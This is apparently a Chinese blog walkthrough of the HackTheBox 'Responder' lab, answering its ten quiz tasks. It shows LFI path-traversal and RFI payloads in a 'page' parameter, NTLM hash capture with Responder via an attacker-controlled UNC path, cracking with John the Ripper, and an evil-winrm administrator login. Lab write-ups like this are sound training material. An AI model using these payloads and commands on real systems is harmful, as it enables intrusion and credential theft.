目录

  1. 1. 前言
  2. 2. Task1
  3. 3. Task2
  4. 4. Task3
  5. 5. Task4
  6. 6. Task5
  7. 7. Task6
  8. 8. Task7
  9. 9. Task8
  10. 10. Task9
  11. 11. Task10
  12. 12. Submit Flag

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

HTB Responder

2023/9/24 渗透 HackTheBox
字数统计: 931字   |   阅读时长: 4分   |   总文章阅读量:

前言

第一层 Responder

打windows php服务

Tips:ctrl+a可以看到nmap的扫描进度

Task1

When visiting the web service using the IP address, what is the domain that we are being redirected to?
使用 IP 地址访问 Web 服务时,我们要重定向到的域是什么?

A:unika.htb

访问靶机的ip地址,发现被重定向到unika.htb

image-20230924092233672

Task2

Which scripting language is being used on the server to generate webpages?
服务器上使用哪种脚本语言来生成网页?

A:php

修改hosts文件,将机器IP指向unika.htb,重新访问

vim /etc/hosts

添加10.129.95.234 unika.htb(vim的操作在我之前的博客有

image-20230924092512528

nmap开扫

nmap -sV 10.129.95.234

image-20230924094121502

可知是PHP(事后:其实直接f12看网络里面就能看到是php了。。。

Task3

What is the name of the URL parameter which is used to load different language versions of the webpage?
用于加载网页不同语言版本的 URL 参数的名称是什么?

A:page

网页上点击更换语言的时候url出现了index.php?page=

image-20230924093146567

Task4

Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
“page”参数的以下哪一个值是利用本地文件包含 (LFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“, ”minikatz.exe”

A:../../../../../../../../Windows/system32/drivers/etc/hosts

目录穿越读取本地文件实现LFI

image-20230924094306614

Task5

Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
“page”参数的以下哪一个值是利用远程文件包含 (RFI) 漏洞的示例:“法语.html”、“//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“, ”minikatz.exe”

A://10.10.14.6/somefile

RFI是包含远程服务器上的文件

image-20230924094459381

Task6

What does NTLM stand for?
NTLM 代表什么?

A:new technology LAN manager

NTLM是由Microsoft所创造的一种安全协定,它是一个挑战(challenge)与响应(response)的机制,认证client取得active directory里的资源。其中一个特点就是single sign-on(SSO),只需要一次验证过就能够取得资源。

Task7

Which flag do we use in the Responder utility to specify the network interface?
我们在Responder工具中使用哪个标志来指定网络接口?

A:-I

看看帮助文档

responder --help

image-20230924094911888

Task8

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?.
有几种工具可以接受 NetNTLMv2 质询/响应,并尝试数百万个密码,以查看其中是否有任何密码生成相同的响应。一个这样的工具通常被称为“john”,但全名是什么?

A:John The Ripper

Task9

What is the password for the administrator user?
管理员用户的密码是什么?

A:badminton

先获取NTLM hash

查看自己的ip地址,选tun0的

ip a

url修改http://unika.htb/index.php?page=//10.10.14.23/somefile

然后抓包

responder -I tun0

接着访问我们修改过后的url,回到终端就能看到NTLM hash了

image-20230924100621371

复制hash值,退出抓包,把hash值存入文件

vim hash.txt

然后用john和kali自带的字典破解

john -w=/usr/share/wordlists/rockyou.txt hash.txt

image-20230924101248900

得到密码

Task10

We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
我们将使用 Windows 服务(即在机器上运行)使用我们恢复的密码远程访问响应程序计算机。它侦听什么端口 TCP?

A:5985

重新扫一手,全端口扫描

nmap -p- --min-rate 5000 10.129.95.234 --open -v

image-20230924102802156

发现还开了个5985的wsman端口(即windows远程管理的端口)

Submit Flag

远程连接该端口

evil-winrm -i 10.129.95.234 -u administrator -p badminton

翻一翻文件夹找到flag

image-20230924103402928

image-20230924103448921